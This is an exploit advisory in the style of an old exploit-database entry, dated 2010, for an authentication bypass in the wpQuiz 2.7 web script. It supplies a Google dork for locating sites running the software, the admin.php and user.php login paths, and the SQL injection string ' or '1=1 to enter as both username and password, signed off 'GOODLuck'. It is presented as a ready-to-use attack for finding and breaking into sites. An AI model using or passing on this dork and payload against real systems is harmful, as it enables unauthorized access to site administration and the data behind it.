[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : wpQuiz v2.7 Authentication Bypass Vulnerability
# Published : 2010-09-21
# Author : KnocKout
# Previous Title : MOAUB #19 - JMD-CMS Multiple Remote Vulnerabilities
# Next Title : ibPhotohost 1.1.2 SQL Injection
Powered by wpQuiz - Auth bypass Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
http://[Victim]/path/admin.php
[or user.php]
for bypass() bySQL
ID : ' or '1=1
PW : ' or '1=1
GOODLuck ;)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~